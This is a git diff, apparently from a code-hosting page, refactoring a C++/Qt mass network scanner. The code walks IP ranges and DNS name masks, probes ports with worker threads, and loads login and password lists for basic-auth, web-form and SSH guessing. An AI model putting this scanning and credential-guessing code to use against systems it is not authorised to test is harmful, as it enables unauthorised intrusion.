<string><!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0//EN" "http://www.w3.org/TR/REC-html40/strict.dtd">
|
||||
<html><head><meta name="qrichtext" content="1" /><style type="text/css">
|
||||
p, li { white-space: pre-wrap; }
|
||||
</style></head><body style=" font-family:'Eurostile'; font-size:11pt; font-weight:400; font-style:normal;">
|
||||
</style></head><body style=" font-family:'Eurostile'; font-size:8.25pt; font-weight:400; font-style:normal;">
|
||||
<p style="-qt-paragraph-type:empty; margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px; font-size:8pt;"><br /></p></body></html></string>
|
||||
</property>
|
||||
<property name="acceptRichText">
|
||||
@ -3663,7 +3666,7 @@ p, li { white-space: pre-wrap; }
|
||||
<string><!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0//EN" "http://www.w3.org/TR/REC-html40/strict.dtd">
|
||||
<html><head><meta name="qrichtext" content="1" /><style type="text/css">
|
||||
p, li { white-space: pre-wrap; }
|
||||
</style></head><body style=" font-family:'Eurostile'; font-size:11pt; font-weight:400; font-style:normal;">
|
||||
</style></head><body style=" font-family:'Eurostile'; font-size:8.25pt; font-weight:400; font-style:normal;">
|
||||
<p style="-qt-paragraph-type:empty; margin-top:2px; margin-bottom:2px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px; font-size:8pt;"><br /></p></body></html></string>
|
||||
</property>
|
||||
<property name="acceptRichText">
|
||||
|
@ -220,8 +220,9 @@ void _SaveBackupToFile()
|
||||
{
|
||||
for(int tCounter = gC; tCounter < flCounter; ++tCounter)
|
||||
{
|
||||
sprintf(ipRange, "%s-%d.%d.%d.%d\n",
|
||||
currentIP, ipsendfl[tCounter][0], ipsendfl[tCounter][1], ipsendfl[tCounter][2], ipsendfl[tCounter][3]);
|
||||
sprintf(ipRange, "%d.%d.%d.%d-%d.%d.%d.%d\n",
|
||||
ipsstartfl[tCounter][0], ipsstartfl[tCounter][1], ipsstartfl[tCounter][2], ipsstartfl[tCounter][3],
|
||||
ipsendfl[tCounter][0], ipsendfl[tCounter][1], ipsendfl[tCounter][2], ipsendfl[tCounter][3]);
|
||||
|
||||
fputs(ipRange, savingFile);
|
||||
|
||||
@ -775,48 +776,65 @@ unsigned long int numOfIps(int ipsstart[], int ipsend[]) {
|
||||
|
||||
void _connect() {
|
||||
string ip = "";
|
||||
while(globalScanFlag) {
|
||||
std::unique_lock<std::mutex> lk(Threader::m);
|
||||
Threader::cv.wait(lk, []{return Threader::ready;});
|
||||
if(globalScanFlag == false) break;
|
||||
if(Threader::threadId > gThreads) {
|
||||
--Threader::threadId;
|
||||
return;
|
||||
}
|
||||
while (globalScanFlag) {
|
||||
std::unique_lock<std::mutex> lk(Threader::m);
|
||||
Threader::cv.wait(lk, []{return Threader::ready; });
|
||||
if (Threader::threadId > gThreads || !globalScanFlag) {
|
||||
--Threader::threadId;
|
||||
Threader::ready = false;
|
||||
lk.unlock();
|
||||
return;
|
||||
}
|
||||
|
||||
ip = Threader::ipQueue.front();
|
||||
if (!Threader::ipQueue.empty()) {
|
||||
ip = Threader::ipQueue.front();
|
||||
Threader::ipQueue.pop();
|
||||
Threader::ready = false;
|
||||
lk.unlock();
|
||||
|
||||
Threader::ipQueue.pop();
|
||||
Threader::ready = false;
|
||||
lk.unlock();
|
||||
if (ip.size() == 0) return;
|
||||
|
||||
ConInc();
|
||||
for(int i = 0; i <= overallPorts; ++i)
|
||||
{
|
||||
if(globalScanFlag == false) break;
|
||||
if(Connector::_ConnectToPort( ip, portArr[i], "" ) == -2) break;
|
||||
};
|
||||
ConDec();
|
||||
ConInc();
|
||||
for (int i = 0; i <= overallPorts; ++i)
|
||||
{
|
||||
if (globalScanFlag == false) break;
|
||||
if (Connector::_ConnectToPort(ip, portArr[i], "") == -2) break;
|
||||
};
|
||||
ConDec();
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
void targetAndIPWriter(long long unsigned int target, const char *ip) {
|
||||
void verboseProgress(long long unsigned int target, const char *ip) {
|
||||
|
||||
char targetNPers[32] = {0};
|
||||
char targetNPers[128] = {0};
|
||||
float percent = (gTargetsOverall != 0 ? (100 - target/(double)gTargetsOverall * 100) : 0);
|
||||
|
||||
stt->doEmitionIPRANGE(QString(ip));
|
||||
strcpy(currentIP, ip);
|
||||
|
||||
sprintf(targetNPers, "%Lu (%.1f%%)",
|
||||
target,
|
||||
percent);
|
||||
stt->doEmitionTargetsLeft(QString(targetNPers));
|
||||
//sprintf(targetNPers, "%Lu (%.1f%%)", target, percent);
|
||||
//stt->doEmitionTargetsLeft(QString(targetNPers));
|
||||
|
||||
sprintf(metaTargets, "%Lu", target);
|
||||
sprintf(metaPercent, "%.1f",
|
||||
percent);
|
||||
}
|
||||
void verboseProgressDNS(long long unsigned int target, const char *ip, const char *TLD) {
|
||||
|
||||
char targetNPers[128] = { 0 };
|
||||
float percent = (gTargetsOverall != 0 ? (100 - target / (double)gTargetsOverall * 100) : 0);
|
||||
|
||||
stt->doEmitionIPRANGE(QString(ip) + QString(TLD));
|
||||
strcpy(currentIP, ip);
|
||||
|
||||
//sprintf(targetNPers, "%Lu (%.1f%%)", target, percent);
|
||||
//stt->doEmitionTargetsLeft(QString(targetNPers));
|
||||
|
||||
sprintf(metaTargets, "%Lu", target);
|
||||
sprintf(metaPercent, "%.1f",
|
||||
percent);
|
||||
}
|
||||
|
||||
void _passLoginLoader() {
|
||||
MaxLogin = 0;
|
||||
@ -1010,10 +1028,6 @@ void _passLoginLoader() {
|
||||
stt->doEmitionRedFoundData("No password/login list found");
|
||||
stt->doEmitionKillSttThread();
|
||||
};
|
||||
|
||||
stt->doEmitionYellowFoundData("BA: ~" + QString::number(MaxLogin * MaxPass/gTimeOut/60)
|
||||
+ "; WF: ~" + QString::number(MaxWFLogin * MaxWFPass/gTimeOut/60)
|
||||
+ "; SSH: ~" + QString::number(MaxSSHPass/gTimeOut/60));
|
||||
}
|
||||
|
||||
void ReadUTF8(FILE* nFile, char *cp) {
|
||||
@ -2090,7 +2104,7 @@ int _GetDNSFromMask(char *mask, char *saveMask, char *saveMaskEnder) {
|
||||
if(globalScanFlag == false) return 0;
|
||||
|
||||
string res = string(mask);
|
||||
targetAndIPWriter(--gTargets, res.c_str());
|
||||
verboseProgressDNS(--gTargets, res.c_str(), top_level_domain);
|
||||
res += string(top_level_domain);
|
||||
|
||||
++indexIP;
|
||||
@ -2099,6 +2113,15 @@ int _GetDNSFromMask(char *mask, char *saveMask, char *saveMaskEnder) {
|
||||
};
|
||||
}
|
||||
|
||||
void runAuxiliaryThreads() {
|
||||
std::thread saverThread(_saver);
|
||||
std::thread trackerThread(_tracker);
|
||||
std::thread timerThread(_timer);
|
||||
saverThread.detach();
|
||||
trackerThread.detach();
|
||||
timerThread.detach();
|
||||
}
|
||||
|
||||
int startScan(char* args) {
|
||||
curl_global_init(CURL_GLOBAL_ALL);
|
||||
SSL_library_init();
|
||||
@ -2121,57 +2144,53 @@ int startScan(char* args) {
|
||||
ZeroMemory(octet, sizeof(octet));
|
||||
ZeroMemory(ipsstart, sizeof(ipsstart));
|
||||
ZeroMemory(ipsend, sizeof(ipsend));
|
||||
|
||||
|
||||
#if defined(WIN32) || defined(_WIN32) || defined(__WIN32) && !defined(__CYGWIN__)
|
||||
CreateDirectory(L(RESULT_DIR_NAME), NULL);
|
||||
//std::string OutputFolder = std::string(RESULT_DIR_NAME);
|
||||
CreateDirectoryA(RESULT_DIR_NAME, NULL);
|
||||
#else
|
||||
struct stat str = {0};
|
||||
if (stat(RESULT_DIR_NAME, &str) == -1) {
|
||||
mkdir(RESULT_DIR_NAME, 0700);
|
||||
struct stat str = {0};
|
||||
if (stat(RESULT_DIR_NAME, &str) == -1) {
|
||||
mkdir(RESULT_DIR_NAME, 0700);
|
||||
}
|
||||
#endif
|
||||
|
||||
int argc = 0;
|
||||
char *argv[512] = {0};
|
||||
char *argv[512] = { 0 };
|
||||
|
||||
char *tStr = strtok(args, "|");
|
||||
while(tStr != NULL)
|
||||
while (tStr != NULL)
|
||||
{
|
||||
argv[argc++] = tStr;
|
||||
tStr = strtok(NULL, "|");
|
||||
};
|
||||
|
||||
|
||||
ParseArgs(argc, argv);
|
||||
mode = gMode;
|
||||
int resInit = fInit(gMode, gRange);
|
||||
|
||||
if(resInit == -1 )
|
||||
{
|
||||
stt->doEmitionRedFoundData("[Error] fInit failure");
|
||||
if (resInit == -1)
|
||||
{
|
||||
stt->doEmitionRedFoundData("[Error] fInit failure");
|
||||
stt->doEmitionKillSttThread();
|
||||
|
||||
|
||||
return -1;
|
||||
};
|
||||
|
||||
stt->doEmitionIPRANGE(QString("--"));
|
||||
stt->doEmitionThreads(QString::number(0) + "/" + QString::number(gThreads));
|
||||
stt->doEmitionIPRANGE(QString("--"));
|
||||
stt->doEmitionThreads(QString::number(0) + "/" + QString::number(gThreads));
|
||||
|
||||
_passLoginLoader();
|
||||
_NegativeLoader();
|
||||
_passLoginLoader();
|
||||
_NegativeLoader();
|
||||
|
||||
if (gMode == 0)
|
||||
{
|
||||
std::thread saverThread(_saver);
|
||||
std::thread trackerThread(_tracker);
|
||||
std::thread timerThread(_timer);
|
||||
saverThread.detach();
|
||||
trackerThread.detach();
|
||||
timerThread.detach();
|
||||
runAuxiliaryThreads();
|
||||
|
||||
unsigned long ip1 = (ipsstart[0] * 16777216) + (ipsstart[1] * 65536) + (ipsstart[2] * 256) + ipsstart[3];
|
||||
unsigned long ip1 = (ipsstart[0] * 16777216) + (ipsstart[1] * 65536) + (ipsstart[2] * 256) + ipsstart[3];
|
||||
unsigned long ip2 = (ipsend[0] * 16777216) + (ipsend[1] * 65536) + (ipsend[2] * 256) + ipsend[3];
|
||||
|
||||
switch (gShuffle) {
|
||||
switch (gShuffle) {
|
||||
case true: {
|
||||
std::vector<std::string> ipVec;
|
||||
struct in_addr tAddr;
|
||||
@ -2179,35 +2198,27 @@ int startScan(char* args) {
|
||||
for (unsigned long i = ip1; i <= ip2; ++i) {
|
||||
|
||||
if (globalScanFlag == false) break;
|
||||
unsigned long offset = ip2 - i;
|
||||
unsigned long offset = ip2 - i;
|
||||
|
||||
tAddr.s_addr = i;
|
||||
#if defined(WIN32) || defined(_WIN32) || defined(__WIN32) && !defined(__CYGWIN__)
|
||||
ipVec.push_back(std::to_string(tAddr.S_un.S_un_b.s_b4)
|
||||
+ "." + std::to_string(tAddr.S_un.S_un_b.s_b3)
|
||||
+ "." + std::to_string(tAddr.S_un.S_un_b.s_b2)
|
||||
+ "." + std::to_string(tAddr.S_un.S_un_b.s_b1));
|
||||
#else
|
||||
tAddr.s_addr = ntohl(tAddr.s_addr);
|
||||
ipVec.push_back(inet_ntoa(tAddr));
|
||||
#endif
|
||||
if(ipVec.size() != 0) strcpy(currentIP, ipVec[0].c_str());
|
||||
tAddr.s_addr = ntohl(i);
|
||||
ipVec.push_back(inet_ntoa(tAddr));
|
||||
if (ipVec.size() != 0) strcpy(currentIP, ipVec[0].c_str());
|
||||
|
||||
if (ipVec.size() >= (offset < 1000 ? offset : 1000)) {
|
||||
|
||||
std::random_shuffle(ipVec.begin(), ipVec.end());
|
||||
while (ipVec.size() != 0) {
|
||||
|
||||
while (cons >= gThreads && globalScanFlag) Sleep(500);
|
||||
if (globalScanFlag == false) goto haters_gonna_hate_IPM;
|
||||
while (cons >= gThreads && globalScanFlag) Sleep(500);
|
||||
if (globalScanFlag == false) goto haters_gonna_hate_IPM;
|
||||
|
||||
++indexIP;
|
||||
std::string res = ipVec[0];
|
||||
ipVec.erase(ipVec.begin());
|
||||
++indexIP;
|
||||
std::string res = ipVec[0];
|
||||
ipVec.erase(ipVec.begin());
|
||||
|
||||
targetAndIPWriter(gTargets--, res.c_str());
|
||||
verboseProgress(gTargets--, res.c_str());
|
||||
|
||||
Threader::fireThread(res, (void*(*)(void))_connect);
|
||||
Threader::fireThread(res, (void*(*)(void))_connect);
|
||||
}
|
||||
}
|
||||
}
|
||||
@ -2217,113 +2228,100 @@ int startScan(char* args) {
|
||||
}
|
||||
case false: {
|
||||
struct in_addr tAddr;
|
||||
for (unsigned long i = ip1; i <= ip2; ++i) {
|
||||
for (unsigned long i = ip1; i <= ip2; ++i) {
|
||||
|
||||
while (cons >= gThreads && globalScanFlag) Sleep(500);
|
||||
if (globalScanFlag == false) break;
|
||||
while (cons >= gThreads && globalScanFlag) Sleep(500);
|
||||
if (globalScanFlag == false) break;
|
||||
|
||||
std::string res = "";
|
||||
std::string res = "";
|
||||
++indexIP;
|
||||
|
||||
tAddr.s_addr = i;
|
||||
#if defined(WIN32) || defined(_WIN32) || defined(__WIN32) && !defined(__CYGWIN__)
|
||||
strcpy(res, (std::to_string(tAddr.S_un.S_un_b.s_b4)
|
||||
+ "." + std::to_string(tAddr.S_un.S_un_b.s_b3)
|
||||
+ "." + std::to_string(tAddr.S_un.S_un_b.s_b2)
|
||||
+ "." + std::to_string(tAddr.S_un.S_un_b.s_b1)).c_str());
|
||||
#else
|
||||
tAddr.s_addr = ntohl(tAddr.s_addr);
|
||||
res = string(inet_ntoa(tAddr));
|
||||
#endif
|
||||
targetAndIPWriter(gTargets--, res.c_str());
|
||||
tAddr.s_addr = ntohl(i);
|
||||
res = string(inet_ntoa(tAddr));
|
||||
verboseProgress(gTargets--, res.c_str());
|
||||
|
||||
Threader::fireThread(res, (void*(*)(void))_connect);
|
||||
Threader::fireThread(res, (void*(*)(void))_connect);
|
||||
}
|
||||
break;
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
else if(gMode == 1 )
|
||||
else if (gMode == 1)
|
||||
{
|
||||
std::thread saverThread(_saver);
|
||||
std::thread trackerThread(_tracker);
|
||||
std::thread timerThread(_timer);
|
||||
saverThread.detach();
|
||||
trackerThread.detach();
|
||||
timerThread.detach();
|
||||
runAuxiliaryThreads();
|
||||
|
||||
strcpy(top_level_domain, gFirstDom);
|
||||
|
||||
char dataEntry[1024] = {0};
|
||||
int innerCounter = 0;
|
||||
int sz = strlen(saveEndIP);
|
||||
char dataEntry[1024] = { 0 };
|
||||
int innerCounter = 0;
|
||||
int sz = strlen(saveEndIP);
|
||||
|
||||
for(int i = 0; i < sz; ++i)
|
||||
{
|
||||
if(saveEndIP[i] == '\\')
|
||||
for (int i = 0; i < sz; ++i)
|
||||
{
|
||||
if(saveEndIP[i + 1] == 'd')
|
||||
if (saveEndIP[i] == '\\')
|
||||
{
|
||||
strcat(dataEntry, "[09]");
|
||||
++i;
|
||||
innerCounter += 4;
|
||||
continue;
|
||||
}
|
||||
else if(saveEndIP[i + 1] == 'w')
|
||||
{
|
||||
strcat(dataEntry, "[0z]");
|
||||
++i;
|
||||
innerCounter += 4;
|
||||
continue;
|
||||
}
|
||||
else if(saveEndIP[i + 1] == 'l')
|
||||
{
|
||||
strcat(dataEntry, "[az]");
|
||||
++i;
|
||||
innerCounter += 4;
|
||||
continue;
|
||||
if (saveEndIP[i + 1] == 'd')
|
||||
{
|
||||
strcat(dataEntry, "[09]");
|
||||
++i;
|
||||
innerCounter += 4;
|
||||
continue;
|
||||
}
|
||||
else if (saveEndIP[i + 1] == 'w')
|
||||
{
|
||||
strcat(dataEntry, "[0z]");
|
||||
++i;
|
||||
innerCounter += 4;
|
||||
continue;
|
||||
}
|
||||
else if (saveEndIP[i + 1] == 'l')
|
||||
{
|
||||
strcat(dataEntry, "[az]");
|
||||
++i;
|
||||
innerCounter += 4;
|
||||
continue;
|
||||
}
|
||||
else
|
||||
{
|
||||
QString errStr = "Error at mask (Position:" + QString::number(i + 1);
|
||||
errStr += ") \"";
|
||||
errStr += QString(saveEndIP).mid(0, i == 0 ? 0 : i);
|
||||
errStr += "<u>";
|
||||
errStr += QString(saveEndIP).mid(i, i == 0 ? i + 2 : i + 1);
|
||||
errStr += "</u>";
|
||||
errStr += QString(saveEndIP).mid(i + 2, strlen(saveEndIP));
|
||||
errStr += "\"";
|
||||
|
||||
stt->doEmitionRedFoundData(errStr);
|
||||
return -1;
|
||||
};
|
||||
}
|
||||
else
|
||||
{
|
||||
QString errStr = "Error at mask (Position:" + QString::number(i+1);
|
||||
errStr += ") \"";
|
||||
errStr += QString(saveEndIP).mid(0, i == 0 ? 0 : i);
|
||||
errStr += "<u>";
|
||||
errStr += QString(saveEndIP).mid(i, i == 0 ? i+2 : i+1);
|
||||
errStr += "</u>";
|
||||
errStr += QString(saveEndIP).mid(i+2, strlen(saveEndIP));
|
||||
errStr += "\"";
|
||||
|
||||
stt->doEmitionRedFoundData(errStr);
|
||||
return -1;
|
||||
memset(dataEntry + innerCounter++, saveEndIP[i], 1);
|
||||
};
|
||||
}
|
||||
else
|
||||
{
|
||||
memset(dataEntry + innerCounter++, saveEndIP[i], 1);
|
||||
};
|
||||
};
|
||||
memset(dataEntry + innerCounter + 1, '\0', 1);
|
||||
|
||||
for(int i = 0; i < sz; ++i)
|
||||
for (int i = 0; i < sz; ++i)
|
||||
{
|
||||
if(dataEntry[i] == '[')
|
||||
if (dataEntry[i] == '[')
|
||||
{
|
||||
for(int j = i + 1; j < i + 3; ++j)
|
||||
for (int j = i + 1; j < i + 3; ++j)
|
||||
{
|
||||
if((dataEntry[j] < '0' || dataEntry[j] > '9')
|
||||
if ((dataEntry[j] < '0' || dataEntry[j] > '9')
|
||||
&& (dataEntry[j] < 'a' || dataEntry[j] > 'z')
|
||||
&& dataEntry[j] != '_'
|
||||
&& dataEntry[j] != '_'
|
||||
&& dataEntry[j] != '-'
|
||||
)
|
||||
{
|
||||
QString errStr = "Error at mask (" + QString::number(j-1);
|
||||
QString errStr = "Error at mask (" + QString::number(j - 1);
|
||||
errStr += ") \"";
|
||||
errStr += QString(dataEntry).mid(0, j-1);
|
||||
errStr += QString(dataEntry).mid(0, j - 1);
|
||||
errStr += "<u>";
|
||||
errStr += QString(dataEntry).mid(j-1, j+1);
|
||||
errStr += QString(dataEntry).mid(j - 1, j + 1);
|
||||
errStr += "</u>";
|
||||
errStr += QString(dataEntry).mid(j+1, strlen(dataEntry));
|
||||
errStr += QString(dataEntry).mid(j + 1, strlen(dataEntry));
|
||||
errStr += "\"";
|
||||
|
||||
stt->doEmitionRedFoundData(errStr);
|
||||
@ -2332,15 +2330,15 @@ int startScan(char* args) {
|
||||
};
|
||||
i += 3;
|
||||
}
|
||||
else if(dataEntry[i] == ']')
|
||||
else if (dataEntry[i] == ']')
|
||||
{
|
||||
QString errStr = "Error at mask (" + QString::number(i-1);
|
||||
QString errStr = "Error at mask (" + QString::number(i - 1);
|
||||
errStr += ") \"";
|
||||
errStr += QString(dataEntry).mid(0, i-1);
|
||||
errStr += QString(dataEntry).mid(0, i - 1);
|
||||
errStr += "<u>";
|
||||
errStr += QString(dataEntry).mid(i-1, i+1);
|
||||
errStr += QString(dataEntry).mid(i - 1, i + 1);
|
||||
errStr += "</u>";
|
||||
errStr += QString(dataEntry).mid(i+1, strlen(dataEntry));
|
||||
errStr += QString(dataEntry).mid(i + 1, strlen(dataEntry));
|
||||
errStr += "\"";
|
||||
|
||||
stt->doEmitionRedFoundData(errStr);
|
||||
@ -2350,19 +2348,19 @@ int startScan(char* args) {
|
||||
|
||||
unsigned long long dnsCounter = 1;
|
||||
char *dnsPtr1 = strstr(dataEntry, "[");
|
||||
while(dnsPtr1 != NULL)
|
||||
while (dnsPtr1 != NULL)
|
||||
{
|
||||
dnsCounter *= _getChunkCount(dnsPtr1);
|
||||
dnsPtr1 = strstr(dnsPtr1 + 1, "[");
|
||||
};
|
||||
};
|
||||
|
||||
gTargets = dnsCounter;
|
||||
gTargetsOverall = gTargets;
|
||||
stt->doEmitionYellowFoundData("Starting DNS-scan...");
|
||||
stt->doEmitionChangeStatus("Scanning...");
|
||||
|
||||
int y = _GetDNSFromMask(dataEntry, "", dataEntry);
|
||||
if(y == -1)
|
||||
|
||||
int y = _GetDNSFromMask(dataEntry, "", dataEntry);
|
||||
if (y == -1)
|
||||
{
|
||||
stt->doEmitionRedFoundData("DNS-Mode error");
|
||||
};
|
||||
@ -2371,23 +2369,18 @@ int startScan(char* args) {
|
||||
{
|
||||
if (flCounter == 0)
|
||||
{
|
||||
stt->doEmitionRedFoundData("Empty IP list.");
|
||||
globalScanFlag = false;
|
||||
stt->doEmitionRedFoundData("Empty IP list.");
|
||||
globalScanFlag = false;
|
||||
stt->doEmitionKillSttThread();
|
||||
|
||||
return -1;
|
||||
};
|
||||
|
||||
std::thread saverThread(_saver);
|
||||
std::thread trackerThread(_tracker);
|
||||
std::thread timerThread(_timer);
|
||||
saverThread.detach();
|
||||
trackerThread.detach();
|
||||
timerThread.detach();
|
||||
runAuxiliaryThreads();
|
||||
|
||||
stt->doEmitionChangeStatus("Scanning...");
|
||||
stt->doEmitionChangeStatus("Scanning...");
|
||||
for (gC = 0; gC < flCounter; ++gC)
|
||||
{
|
||||
{
|
||||
strcpy(metaRange, std::to_string(ipsstartfl[gC][0]).c_str());
|
||||
strcat(metaRange, ".");
|
||||
strcat(metaRange, std::to_string(ipsstartfl[gC][1]).c_str());
|
||||
@ -2403,9 +2396,9 @@ int startScan(char* args) {
|
||||
strcat(metaRange, std::to_string(ipsendfl[gC][2]).c_str());
|
||||
strcat(metaRange, ".");
|
||||
strcat(metaRange, std::to_string(ipsendfl[gC][3]).c_str());
|
||||
|
||||
unsigned long ip1 = (ipsstartfl[gC][0] * 16777216) + (ipsstartfl[gC][1] * 65536) + (ipsstartfl[gC][2] * 256) + ipsstartfl[gC][3];
|
||||
unsigned long ip2 = (ipsendfl[gC][0] * 16777216) + (ipsendfl[gC][1] * 65536) + (ipsendfl[gC][2] * 256) + ipsendfl[gC][3];
|
||||
|
||||
unsigned long ip1 = (ipsstartfl[gC][0] * 16777216) + (ipsstartfl[gC][1] * 65536) + (ipsstartfl[gC][2] * 256) + ipsstartfl[gC][3];
|
||||
unsigned long ip2 = (ipsendfl[gC][0] * 16777216) + (ipsendfl[gC][1] * 65536) + (ipsendfl[gC][2] * 256) + ipsendfl[gC][3];
|
||||
|
||||
switch (gShuffle) {
|
||||
case true: {
|
||||
@ -2415,32 +2408,27 @@ int startScan(char* args) {
|
||||
for (unsigned long i = ip1; i <= ip2; ++i) {
|
||||
|
||||
if (globalScanFlag == false) break;
|
||||
unsigned long offset = ip2 - i;
|
||||
unsigned long offset = ip2 - i;
|
||||
|
||||
tAddr.s_addr = i;
|
||||
#if defined(WIN32) || defined(_WIN32) || defined(__WIN32) && !defined(__CYGWIN__)
|
||||
ipVec.push_back(std::to_string(tAddr.S_un.S_un_b.s_b4) + "." + std::to_string(tAddr.S_un.S_un_b.s_b3) + "." + std::to_string(tAddr.S_un.S_un_b.s_b2) + "." + std::to_string(tAddr.S_un.S_un_b.s_b1));
|
||||
#else
|
||||
tAddr.s_addr = ntohl(tAddr.s_addr);
|
||||
ipVec.push_back(inet_ntoa(tAddr));
|
||||
#endif
|
||||
if(ipVec.size() != 0) strcpy(currentIP, ipVec[0].c_str());
|
||||
tAddr.s_addr = ntohl(i);
|
||||
ipVec.push_back(inet_ntoa(tAddr));
|
||||
if (ipVec.size() != 0) strcpy(currentIP, ipVec[0].c_str());
|
||||
|
||||
if (ipVec.size() >= (offset < 1000 ? offset : 1000)) {
|
||||
|
||||
std::random_shuffle(ipVec.begin(), ipVec.end());
|
||||
while (ipVec.size() != 0) {
|
||||
|
||||
while (cons >= gThreads && globalScanFlag) Sleep(500);
|
||||
if (globalScanFlag == false) goto haters_gonna_hate_IM;
|
||||
while (cons >= gThreads && globalScanFlag) Sleep(500);
|
||||
if (globalScanFlag == false) goto haters_gonna_hate_IM;
|
||||
|
||||
++indexIP;
|
||||
std::string res = ipVec[0];
|
||||
++indexIP;
|
||||
std::string res = ipVec[0];
|
||||
ipVec.erase(ipVec.begin());
|
||||
|
||||
targetAndIPWriter(gTargets--, res.c_str());
|
||||
verboseProgress(gTargets--, res.c_str());
|
||||
|
||||
Threader::fireThread(res, (void*(*)(void))_connect);
|
||||
Threader::fireThread(res, (void*(*)(void))_connect);
|
||||
}
|
||||
}
|
||||
}
|
||||
@ -2449,26 +2437,20 @@ int startScan(char* args) {
|
||||
}
|
||||
case false: {
|
||||
struct in_addr tAddr;
|
||||
for (unsigned long i = ip1; i <= ip2; ++i) {
|
||||
for (unsigned long i = ip1; i <= ip2; ++i) {
|
||||
|
||||
while (cons >= gThreads && globalScanFlag) Sleep(500);
|
||||
if (globalScanFlag == false) break;
|
||||
while (cons >= gThreads && globalScanFlag) Sleep(500);
|
||||
if (globalScanFlag == false) break;
|
||||
|
||||
++indexIP;
|
||||
|
||||
std::string res = "";
|
||||
tAddr.s_addr = i;
|
||||
#if defined(WIN32) || defined(_WIN32) || defined(__WIN32) && !defined(__CYGWIN__)
|
||||
strcpy(res, (std::to_string(tAddr.S_un.S_un_b.s_b4) + "." + std::to_string(tAddr.S_un.S_un_b.s_b3) + "." + std::to_string(tAddr.S_un.S_un_b.s_b2) + "." + std::to_string(tAddr.S_un.S_un_b.s_b1)).c_str());
|
||||
#else
|
||||
tAddr.s_addr = ntohl(tAddr.s_addr);
|
||||
res = string(inet_ntoa(tAddr));
|
||||
#endif
|
||||
targetAndIPWriter(gTargets--, res.c_str());
|
||||
Threader::fireThread(res, (void*(*)(void))_connect);
|
||||
tAddr.s_addr = ntohl(i);
|
||||
std::string res = string(inet_ntoa(tAddr));
|
||||
verboseProgress(gTargets--, res.c_str());
|
||||
Threader::fireThread(res, (void*(*)(void))_connect);
|
||||
}
|
||||
break;
|
||||
};
|
||||
break;
|
||||
};
|
||||
}
|
||||
}
|
||||
}
|
||||
@ -2482,7 +2464,6 @@ int startScan(char* args) {
|
||||
stt->doEmitionYellowFoundData("Stopping threads...");
|
||||
stt->doEmitionChangeStatus("Stopping...");
|
||||
|
||||
|
||||
while(cons > 0 || jsonArr->size() > 0) {
|
||||
Sleep(2000);
|
||||
};
|
||||
|
Loading…
Reference in New Issue
Block a user